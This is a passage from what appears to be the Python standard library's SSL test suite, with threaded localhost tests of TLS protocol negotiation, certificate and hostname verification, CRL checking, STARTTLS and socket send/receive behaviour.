}[certsreqs]
if support.verbose:
formatstr = (expect_success and " %s->%s %s\n") or " {%s->%s} %s\n"
sys.stdout.write(formatstr %
(ssl.get_protocol_name(client_protocol),
ssl.get_protocol_name(server_protocol),
certtype))
client_context = ssl.SSLContext(client_protocol)
client_context.options |= client_options
server_context = ssl.SSLContext(server_protocol)
server_context.options |= server_options
# NOTE: we must enable "ALL" ciphers on the client, otherwise an
# SSLv23 client will send an SSLv3 hello (rather than SSLv2)
# starting from OpenSSL 1.0.0 (see issue #8322).
if client_context.protocol == ssl.PROTOCOL_TLS:
client_context.set_ciphers("ALL")
for ctx in (client_context, server_context):
ctx.verify_mode = certsreqs
ctx.load_cert_chain(SIGNED_CERTFILE)
ctx.load_verify_locations(SIGNING_CA)
try:
stats = server_params_test(client_context, server_context,
chatty=False, connectionchatty=False)
# Protocol mismatch can result in either an SSLError, or a
# "Connection reset by peer" error.
except ssl.SSLError:
if expect_success:
raise
except OSError as e:
if expect_success or e.errno != errno.ECONNRESET:
raise
else:
if not expect_success:
raise AssertionError(
"Client protocol %s succeeded with server protocol %s!"
% (ssl.get_protocol_name(client_protocol),
ssl.get_protocol_name(server_protocol)))
elif (expect_success is not True
and expect_success != stats['version']):
raise AssertionError("version mismatch: expected %r, got %r"
% (expect_success, stats['version']))
class ThreadedTests(unittest.TestCase):
def test_echo(self):
"""Basic test of an SSL client connecting to a server"""
if support.verbose:
sys.stdout.write("\n")
for protocol in PROTOCOLS:
if protocol in {ssl.PROTOCOL_TLS_CLIENT, ssl.PROTOCOL_TLS_SERVER}:
continue
with self.subTest(protocol=ssl._PROTOCOL_NAMES[protocol]):
context = ssl.SSLContext(protocol)
context.load_cert_chain(CERTFILE)
server_params_test(context, context,
chatty=True, connectionchatty=True)
client_context, server_context, hostname = testing_context()
with self.subTest(client=ssl.PROTOCOL_TLS_CLIENT, server=ssl.PROTOCOL_TLS_SERVER):
server_params_test(client_context=client_context,
server_context=server_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
client_context.check_hostname = False
with self.subTest(client=ssl.PROTOCOL_TLS_SERVER, server=ssl.PROTOCOL_TLS_CLIENT):
with self.assertRaises(ssl.SSLError) as e:
server_params_test(client_context=server_context,
server_context=client_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
self.assertIn('called a function you should not call',
str(e.exception))
with self.subTest(client=ssl.PROTOCOL_TLS_SERVER, server=ssl.PROTOCOL_TLS_SERVER):
with self.assertRaises(ssl.SSLError) as e:
server_params_test(client_context=server_context,
server_context=server_context,
chatty=True, connectionchatty=True)
self.assertIn('called a function you should not call',
str(e.exception))
with self.subTest(client=ssl.PROTOCOL_TLS_CLIENT, server=ssl.PROTOCOL_TLS_CLIENT):
with self.assertRaises(ssl.SSLError) as e:
server_params_test(client_context=server_context,
server_context=client_context,
chatty=True, connectionchatty=True)
self.assertIn('called a function you should not call',
str(e.exception))
def test_getpeercert(self):
if support.verbose:
sys.stdout.write("\n")
client_context, server_context, hostname = testing_context()
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
do_handshake_on_connect=False,
server_hostname=hostname) as s:
s.connect((HOST, server.port))
                # getpeercert() raises ValueError while the handshake
                # isn't done.
with self.assertRaises(ValueError):
s.getpeercert()
s.do_handshake()
cert = s.getpeercert()
self.assertTrue(cert, "Can't get peer certificate.")
cipher = s.cipher()
if support.verbose:
sys.stdout.write(pprint.pformat(cert) + '\n')
sys.stdout.write("Connection cipher is " + str(cipher) + '.\n')
if 'subject' not in cert:
self.fail("No subject field in certificate: %s." %
pprint.pformat(cert))
if ((('organizationName', 'Python Software Foundation'),)
not in cert['subject']):
self.fail(
"Missing or invalid 'organizationName' field in certificate subject; "
"should be 'Python Software Foundation'.")
self.assertIn('notBefore', cert)
self.assertIn('notAfter', cert)
before = ssl.cert_time_to_seconds(cert['notBefore'])
after = ssl.cert_time_to_seconds(cert['notAfter'])
self.assertLess(before, after)
@unittest.skipUnless(have_verify_flags(),
"verify_flags need OpenSSL > 0.9.8")
def test_crl_check(self):
if support.verbose:
sys.stdout.write("\n")
client_context, server_context, hostname = testing_context()
tf = getattr(ssl, "VERIFY_X509_TRUSTED_FIRST", 0)
self.assertEqual(client_context.verify_flags, ssl.VERIFY_DEFAULT | tf)
# VERIFY_DEFAULT should pass
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
cert = s.getpeercert()
self.assertTrue(cert, "Can't get peer certificate.")
# VERIFY_CRL_CHECK_LEAF without a loaded CRL file fails
client_context.verify_flags |= ssl.VERIFY_CRL_CHECK_LEAF
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
with self.assertRaisesRegex(ssl.SSLError,
"certificate verify failed"):
s.connect((HOST, server.port))
# now load a CRL file. The CRL file is signed by the CA.
client_context.load_verify_locations(CRLFILE)
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
cert = s.getpeercert()
self.assertTrue(cert, "Can't get peer certificate.")
def test_check_hostname(self):
if support.verbose:
sys.stdout.write("\n")
client_context, server_context, hostname = testing_context()
# correct hostname should verify
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
cert = s.getpeercert()
self.assertTrue(cert, "Can't get peer certificate.")
# incorrect hostname should raise an exception
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname="invalid") as s:
with self.assertRaisesRegex(
ssl.CertificateError,
"Hostname mismatch, certificate is not valid for 'invalid'."):
s.connect((HOST, server.port))
# missing server_hostname arg should cause an exception, too
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with socket.socket() as s:
with self.assertRaisesRegex(ValueError,
"check_hostname requires server_hostname"):
client_context.wrap_socket(s)
def test_ecc_cert(self):
client_context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
client_context.load_verify_locations(SIGNING_CA)
client_context.set_ciphers('ECDHE:ECDSA:!NULL:!aRSA')
hostname = SIGNED_CERTFILE_ECC_HOSTNAME
server_context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
# load ECC cert
server_context.load_cert_chain(SIGNED_CERTFILE_ECC)
# correct hostname should verify
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
cert = s.getpeercert()
self.assertTrue(cert, "Can't get peer certificate.")
                cipher = s.cipher()[0].split('-')
                # assertTrue() treated the tuple as a message; assert the
                # prefix instead (TLS 1.3 suite names don't carry it).
                if s.version() != 'TLSv1.3':
                    self.assertEqual(cipher[:2], ['ECDHE', 'ECDSA'])
def test_dual_rsa_ecc(self):
client_context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
client_context.load_verify_locations(SIGNING_CA)
# TODO: fix TLSv1.3 once SSLContext can restrict signature
# algorithms.
client_context.options |= ssl.OP_NO_TLSv1_3
# only ECDSA certs
client_context.set_ciphers('ECDHE:ECDSA:!NULL:!aRSA')
hostname = SIGNED_CERTFILE_ECC_HOSTNAME
server_context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
# load ECC and RSA key/cert pairs
server_context.load_cert_chain(SIGNED_CERTFILE_ECC)
server_context.load_cert_chain(SIGNED_CERTFILE)
# correct hostname should verify
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
cert = s.getpeercert()
self.assertTrue(cert, "Can't get peer certificate.")
                cipher = s.cipher()[0].split('-')
                # assertTrue() treated the tuple as a message; with
                # TLS 1.3 disabled above, assert the prefix directly.
                self.assertEqual(cipher[:2], ['ECDHE', 'ECDSA'])
def test_check_hostname_idn(self):
if support.verbose:
sys.stdout.write("\n")
server_context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
server_context.load_cert_chain(IDNSANSFILE)
context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
context.verify_mode = ssl.CERT_REQUIRED
context.check_hostname = True
context.load_verify_locations(SIGNING_CA)
# correct hostname should verify, when specified in several
# different ways
idn_hostnames = [
('könig.idn.pythontest.net',
'xn--knig-5qa.idn.pythontest.net'),
('xn--knig-5qa.idn.pythontest.net',
'xn--knig-5qa.idn.pythontest.net'),
(b'xn--knig-5qa.idn.pythontest.net',
'xn--knig-5qa.idn.pythontest.net'),
('königsgäßchen.idna2003.pythontest.net',
'xn--knigsgsschen-lcb0w.idna2003.pythontest.net'),
('xn--knigsgsschen-lcb0w.idna2003.pythontest.net',
'xn--knigsgsschen-lcb0w.idna2003.pythontest.net'),
(b'xn--knigsgsschen-lcb0w.idna2003.pythontest.net',
'xn--knigsgsschen-lcb0w.idna2003.pythontest.net'),
# ('königsgäßchen.idna2008.pythontest.net',
# 'xn--knigsgchen-b4a3dun.idna2008.pythontest.net'),
('xn--knigsgchen-b4a3dun.idna2008.pythontest.net',
'xn--knigsgchen-b4a3dun.idna2008.pythontest.net'),
(b'xn--knigsgchen-b4a3dun.idna2008.pythontest.net',
'xn--knigsgchen-b4a3dun.idna2008.pythontest.net'),
]
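        # Each pair gives a U-label or A-label spelling and the A-label
        # form that SSLSocket.server_hostname is expected to report.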
for server_hostname, expected_hostname in idn_hostnames:
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with context.wrap_socket(socket.socket(),
server_hostname=server_hostname) as s:
self.assertEqual(s.server_hostname, expected_hostname)
s.connect((HOST, server.port))
cert = s.getpeercert()
self.assertEqual(s.server_hostname, expected_hostname)
self.assertTrue(cert, "Can't get peer certificate.")
# incorrect hostname should raise an exception
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with context.wrap_socket(socket.socket(),
server_hostname="python.example.org") as s:
with self.assertRaises(ssl.CertificateError):
s.connect((HOST, server.port))
def test_wrong_cert_tls12(self):
"""Connecting when the server rejects the client's certificate
Launch a server with CERT_REQUIRED, and check that trying to
connect to it with a wrong client certificate fails.
"""
client_context, server_context, hostname = testing_context()
# load client cert that is not signed by trusted CA
client_context.load_cert_chain(CERTFILE)
# require TLS client authentication
server_context.verify_mode = ssl.CERT_REQUIRED
# TLS 1.3 has different handshake
client_context.maximum_version = ssl.TLSVersion.TLSv1_2
server = ThreadedEchoServer(
context=server_context, chatty=True, connectionchatty=True,
)
with server, \
client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
try:
# Expect either an SSL error about the server rejecting
# the connection, or a low-level connection reset (which
# sometimes happens on Windows)
s.connect((HOST, server.port))
except ssl.SSLError as e:
if support.verbose:
sys.stdout.write("\nSSLError is %r\n" % e)
except OSError as e:
if e.errno != errno.ECONNRESET:
raise
if support.verbose:
sys.stdout.write("\nsocket.error is %r\n" % e)
else:
self.fail("Use of invalid cert should have failed!")
@unittest.skipUnless(ssl.HAS_TLSv1_3, "Test needs TLS 1.3")
def test_wrong_cert_tls13(self):
client_context, server_context, hostname = testing_context()
# load client cert that is not signed by trusted CA
client_context.load_cert_chain(CERTFILE)
server_context.verify_mode = ssl.CERT_REQUIRED
server_context.minimum_version = ssl.TLSVersion.TLSv1_3
client_context.minimum_version = ssl.TLSVersion.TLSv1_3
server = ThreadedEchoServer(
context=server_context, chatty=True, connectionchatty=True,
)
with server, \
client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
            # TLS 1.3 performs the client cert exchange after the handshake
s.connect((HOST, server.port))
try:
s.write(b'data')
s.read(4)
except ssl.SSLError as e:
if support.verbose:
sys.stdout.write("\nSSLError is %r\n" % e)
except OSError as e:
if e.errno != errno.ECONNRESET:
raise
if support.verbose:
sys.stdout.write("\nsocket.error is %r\n" % e)
else:
self.fail("Use of invalid cert should have failed!")
def test_rude_shutdown(self):
"""A brutal shutdown of an SSL server should raise an OSError
in the client when attempting handshake.
"""
listener_ready = threading.Event()
listener_gone = threading.Event()
s = socket.socket()
port = support.bind_port(s, HOST)
# `listener` runs in a thread. It sits in an accept() until
# the main thread connects. Then it rudely closes the socket,
# and sets Event `listener_gone` to let the main thread know
# the socket is gone.
def listener():
s.listen()
listener_ready.set()
newsock, addr = s.accept()
newsock.close()
s.close()
listener_gone.set()
def connector():
listener_ready.wait()
with socket.socket() as c:
c.connect((HOST, port))
listener_gone.wait()
try:
ssl_sock = test_wrap_socket(c)
except OSError:
pass
else:
self.fail('connecting to closed SSL socket should have failed')
t = threading.Thread(target=listener)
t.start()
try:
connector()
finally:
t.join()
def test_ssl_cert_verify_error(self):
if support.verbose:
sys.stdout.write("\n")
server_context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
server_context.load_cert_chain(SIGNED_CERTFILE)
context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with context.wrap_socket(socket.socket(),
server_hostname=SIGNED_CERTFILE_HOSTNAME) as s:
try:
s.connect((HOST, server.port))
except ssl.SSLError as e:
msg = 'unable to get local issuer certificate'
self.assertIsInstance(e, ssl.SSLCertVerificationError)
self.assertEqual(e.verify_code, 20)
self.assertEqual(e.verify_message, msg)
self.assertIn(msg, repr(e))
self.assertIn('certificate verify failed', repr(e))
@unittest.skipUnless(hasattr(ssl, 'PROTOCOL_SSLv2'),
"OpenSSL is compiled without SSLv2 support")
def test_protocol_sslv2(self):
"""Connecting to an SSLv2 server with various client options"""
if support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv2, True)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv2, True, ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv2, True, ssl.CERT_REQUIRED)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_TLS, False)
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv3, False)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_TLSv1, False)
# SSLv23 client with specific SSL options
if no_sslv2_implies_sslv3_hello():
# No SSLv2 => client will use an SSLv3 hello on recent OpenSSLs
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_TLS, False,
client_options=ssl.OP_NO_SSLv2)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_TLS, False,
client_options=ssl.OP_NO_SSLv3)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_TLS, False,
client_options=ssl.OP_NO_TLSv1)
def test_PROTOCOL_TLS(self):
"""Connecting to an SSLv23 server with various client options"""
if support.verbose:
sys.stdout.write("\n")
if hasattr(ssl, 'PROTOCOL_SSLv2'):
try:
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_SSLv2, True)
except OSError as x:
# this fails on some older versions of OpenSSL (0.9.7l, for instance)
if support.verbose:
sys.stdout.write(
" SSL2 client to SSL23 server test unexpectedly failed:\n %s\n"
% str(x))
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_SSLv3, False)
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLS, True)
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLSv1, 'TLSv1')
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_SSLv3, False, ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLS, True, ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLSv1, 'TLSv1', ssl.CERT_OPTIONAL)
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_SSLv3, False, ssl.CERT_REQUIRED)
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLS, True, ssl.CERT_REQUIRED)
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLSv1, 'TLSv1', ssl.CERT_REQUIRED)
# Server with specific SSL options
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_SSLv3, False,
server_options=ssl.OP_NO_SSLv3)
# Will choose TLSv1
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLS, True,
server_options=ssl.OP_NO_SSLv2 | ssl.OP_NO_SSLv3)
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLSv1, False,
server_options=ssl.OP_NO_TLSv1)
@unittest.skipUnless(hasattr(ssl, 'PROTOCOL_SSLv3'),
"OpenSSL is compiled without SSLv3 support")
def test_protocol_sslv3(self):
"""Connecting to an SSLv3 server with various client options"""
if support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv3, 'SSLv3')
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv3, 'SSLv3', ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv3, 'SSLv3', ssl.CERT_REQUIRED)
if hasattr(ssl, 'PROTOCOL_SSLv2'):
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv2, False)
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_TLS, False,
client_options=ssl.OP_NO_SSLv3)
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_TLSv1, False)
if no_sslv2_implies_sslv3_hello():
# No SSLv2 => client will use an SSLv3 hello on recent OpenSSLs
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_TLS,
False, client_options=ssl.OP_NO_SSLv2)
def test_protocol_tlsv1(self):
"""Connecting to a TLSv1 server with various client options"""
if support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1, 'TLSv1')
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1, 'TLSv1', ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1, 'TLSv1', ssl.CERT_REQUIRED)
if hasattr(ssl, 'PROTOCOL_SSLv2'):
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_SSLv2, False)
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_SSLv3, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLS, False,
client_options=ssl.OP_NO_TLSv1)
@unittest.skipUnless(hasattr(ssl, "PROTOCOL_TLSv1_1"),
"TLS version 1.1 not supported.")
def test_protocol_tlsv1_1(self):
"""Connecting to a TLSv1.1 server with various client options.
Testing against older TLS versions."""
if support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_TLSv1_1, 'TLSv1.1')
if hasattr(ssl, 'PROTOCOL_SSLv2'):
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_SSLv2, False)
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_SSLv3, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_TLS, False,
client_options=ssl.OP_NO_TLSv1_1)
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLSv1_1, 'TLSv1.1')
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_TLSv1, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1_1, False)
@unittest.skipUnless(hasattr(ssl, "PROTOCOL_TLSv1_2"),
"TLS version 1.2 not supported.")
def test_protocol_tlsv1_2(self):
"""Connecting to a TLSv1.2 server with various client options.
Testing against older TLS versions."""
if support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_TLSv1_2, 'TLSv1.2',
server_options=ssl.OP_NO_SSLv3|ssl.OP_NO_SSLv2,
client_options=ssl.OP_NO_SSLv3|ssl.OP_NO_SSLv2,)
if hasattr(ssl, 'PROTOCOL_SSLv2'):
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_SSLv2, False)
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_SSLv3, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_TLS, False,
client_options=ssl.OP_NO_TLSv1_2)
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLSv1_2, 'TLSv1.2')
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_TLSv1, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1_2, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_TLSv1_1, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_TLSv1_2, False)
def test_starttls(self):
"""Switching from clear text to encrypted and back again."""
msgs = (b"msg 1", b"MSG 2", b"STARTTLS", b"MSG 3", b"msg 4", b"ENDTLS", b"msg 5", b"msg 6")
server = ThreadedEchoServer(CERTFILE,
starttls_server=True,
chatty=True,
connectionchatty=True)
wrapped = False
with server:
s = socket.socket()
s.setblocking(1)
s.connect((HOST, server.port))
if support.verbose:
sys.stdout.write("\n")
for indata in msgs:
if support.verbose:
sys.stdout.write(
" client: sending %r...\n" % indata)
if wrapped:
conn.write(indata)
outdata = conn.read()
else:
s.send(indata)
outdata = s.recv(1024)
msg = outdata.strip().lower()
if indata == b"STARTTLS" and msg.startswith(b"ok"):
# STARTTLS ok, switch to secure mode
if support.verbose:
sys.stdout.write(
" client: read %r from server, starting TLS...\n"
% msg)
conn = test_wrap_socket(s)
wrapped = True
elif indata == b"ENDTLS" and msg.startswith(b"ok"):
# ENDTLS ok, switch back to clear text
if support.verbose:
sys.stdout.write(
" client: read %r from server, ending TLS...\n"
% msg)
s = conn.unwrap()
wrapped = False
else:
if support.verbose:
sys.stdout.write(
" client: read %r from server\n" % msg)
if support.verbose:
sys.stdout.write(" client: closing connection.\n")
if wrapped:
conn.write(b"over\n")
else:
s.send(b"over\n")
if wrapped:
conn.close()
else:
s.close()
def test_socketserver(self):
"""Using socketserver to create and manage SSL connections."""
server = make_https_server(self, certfile=SIGNED_CERTFILE)
# try to connect
if support.verbose:
sys.stdout.write('\n')
with open(CERTFILE, 'rb') as f:
d1 = f.read()
d2 = ''
# now fetch the same data from the HTTPS server
url = 'https://localhost:%d/%s' % (
server.port, os.path.split(CERTFILE)[1])
context = ssl.create_default_context(cafile=SIGNING_CA)
f = urllib.request.urlopen(url, context=context)
try:
dlen = f.info().get("content-length")
if dlen and (int(dlen) > 0):
d2 = f.read(int(dlen))
if support.verbose:
sys.stdout.write(
" client: read %d bytes from remote server '%s'\n"
% (len(d2), server))
finally:
f.close()
self.assertEqual(d1, d2)
def test_asyncore_server(self):
"""Check the example asyncore integration."""
if support.verbose:
sys.stdout.write("\n")
indata = b"FOO\n"
server = AsyncoreEchoServer(CERTFILE)
with server:
s = test_wrap_socket(socket.socket())
s.connect(('127.0.0.1', server.port))
if support.verbose:
sys.stdout.write(
" client: sending %r...\n" % indata)
s.write(indata)
outdata = s.read()
if support.verbose:
sys.stdout.write(" client: read %r\n" % outdata)
if outdata != indata.lower():
self.fail(
"bad data <<%r>> (%d) received; expected <<%r>> (%d)\n"
% (outdata[:20], len(outdata),
indata[:20].lower(), len(indata)))
s.write(b"over\n")
if support.verbose:
sys.stdout.write(" client: closing connection.\n")
s.close()
if support.verbose:
sys.stdout.write(" client: connection closed.\n")
def test_recv_send(self):
"""Test recv(), send() and friends."""
if support.verbose:
sys.stdout.write("\n")
server = ThreadedEchoServer(CERTFILE,
certreqs=ssl.CERT_NONE,
ssl_version=ssl.PROTOCOL_TLS_SERVER,
cacerts=CERTFILE,
chatty=True,
connectionchatty=False)
with server:
s = test_wrap_socket(socket.socket(),
server_side=False,
certfile=CERTFILE,
ca_certs=CERTFILE,
cert_reqs=ssl.CERT_NONE,
ssl_version=ssl.PROTOCOL_TLS_CLIENT)
s.connect((HOST, server.port))
# helper methods for standardising recv* method signatures
def _recv_into():
b = bytearray(b"\0"*100)
count = s.recv_into(b)
return b[:count]
def _recvfrom_into():
b = bytearray(b"\0"*100)
count, addr = s.recvfrom_into(b)
return b[:count]
# (name, method, expect success?, *args, return value func)
send_methods = [
('send', s.send, True, [], len),
('sendto', s.sendto, False, ["some.address"], len),
('sendall', s.sendall, True, [], lambda x: None),
]
# (name, method, whether to expect success, *args)
recv_methods = [
('recv', s.recv, True, []),
('recvfrom', s.recvfrom, False, ["some.address"]),
('recv_into', _recv_into, True, []),
('recvfrom_into', _recvfrom_into, False, []),
]
data_prefix = "PREFIX_"
for (meth_name, send_meth, expect_success, args,
ret_val_meth) in send_methods:
indata = (data_prefix + meth_name).encode('ascii')
try:
ret = send_meth(indata, *args)
msg = "sending with {}".format(meth_name)
self.assertEqual(ret, ret_val_meth(indata), msg=msg)
outdata = s.read()
if outdata != indata.lower():
self.fail(
"While sending with <<{name:s}>> bad data "
"<<{outdata:r}>> ({nout:d}) received; "
"expected <<{indata:r}>> ({nin:d})\n".format(
name=meth_name, outdata=outdata[:20],
nout=len(outdata),
indata=indata[:20], nin=len(indata)
)
)
except ValueError as e:
if expect_success:
self.fail(
"Failed to send with method <<{name:s}>>; "
"expected to succeed.\n".format(name=meth_name)
)
if not str(e).startswith(meth_name):
self.fail(
"Method <<{name:s}>> failed with unexpected "
"exception message: {exp:s}\n".format(
name=meth_name, exp=e
)
)
for meth_name, recv_meth, expect_success, args in recv_methods:
indata = (data_prefix + meth_name).encode('ascii')
try:
s.send(indata)
outdata = recv_meth(*args)
if outdata != indata.lower():
self.fail(
"While receiving with <<{name:s}>> bad data "
"<<{outdata:r}>> ({nout:d}) received; "
"expected <<{indata:r}>> ({nin:d})\n".format(
name=meth_name, outdata=outdata[:20],
nout=len(outdata),
indata=indata[:20], nin=len(indata)
)
)
except ValueError as e:
if expect_success:
self.fail(
"Failed to receive with method <<{name:s}>>; "
"expected to succeed.\n".format(name=meth_name)
)
if not str(e).startswith(meth_name):
self.fail(
"Method <<{name:s}>> failed with unexpected "
"exception message: {exp:s}\n".format(
name=meth_name, exp=e
)
)
# consume data
s.read()
# read(-1, buffer) is supported, even though read(-1) is not
data = b"data"
s.send(data)
buffer = bytearray(len(data))
self.assertEqual(s.read(-1, buffer), len(data))
self.assertEqual(buffer, data)
# sendall accepts bytes-like objects
if ctypes is not None:
ubyte = ctypes.c_ubyte * len(data)
byteslike = ubyte.from_buffer_copy(data)
s.sendall(byteslike)
self.assertEqual(s.read(), data)
# Make sure sendmsg et al are disallowed to avoid
# inadvertent disclosure of data and/or corruption
# of the encrypted data stream
self.assertRaises(NotImplementedError, s.sendmsg, [b"data"])
self.assertRaises(NotImplementedError, s.recvmsg, 100)
self.assertRaises(NotImplementedError,
s.recvmsg_into, bytearray(100))
s.write(b"over\n")
self.assertRaises(ValueError, s.recv, -1)
self.assertRaises(ValueError, s.read, -1)
s.close()
def test_recv_zero(self):
server = ThreadedEchoServer(CERTFILE)
server.__enter__()
self.addCleanup(server.__exit__, None, None)
s = socket.create_connection((HOST, server.port))
self.addCleanup(s.close)
s = test_wrap_socket(s, suppress_ragged_eofs=False)
self.addCleanup(s.close)
# recv/read(0) should return no data
s.send(b"data")
self.assertEqual(s.recv(0), b"")
self.assertEqual(s.read(0), b"")
self.assertEqual(s.read(), b"data")
# Should not block if the other end sends no data
s.setblocking(False)
self.assertEqual(s.recv(0), b"")
self.assertEqual(s.recv_into(bytearray()), 0)
def test_nonblocking_send(self):
server = ThreadedEchoServer(CERTFILE,
certreqs=ssl.CERT_NONE,
ssl_version=ssl.PROTOCOL_TLS_SERVER,
cacerts=CERTFILE,
chatty=True,
connectionchatty=False)
with server:
s = test_wrap_socket(socket.socket(),
server_side=False,
certfile=CERTFILE,
ca_certs=CERTFILE,
cert_reqs=ssl.CERT_NONE,
ssl_version=ssl.PROTOCOL_TLS_CLIENT)
s.connect((HOST, server.port))
s.setblocking(False)
# If we keep sending data, at some point the buffers
# will be full and the call will block
buf = bytearray(8192)
def fill_buffer():
while True:
s.send(buf)
self.assertRaises((ssl.SSLWantWriteError,
ssl.SSLWantReadError), fill_buffer)
# Now read all the output and discard it
s.setblocking(True)
s.close()
def test_handshake_timeout(self):
# Issue #5103: SSL handshake must respect the socket timeout
server = socket.socket(socket.AF_INET)
host = "127.0.0.1"
port = support.bind_port(server)
started = threading.Event()
finish = False
def serve():
server.listen()
started.set()
conns = []
while not finish:
r, w, e = select.select([server], [], [], 0.1)
if server in r:
# Let the socket hang around rather than having
# it closed by garbage collection.
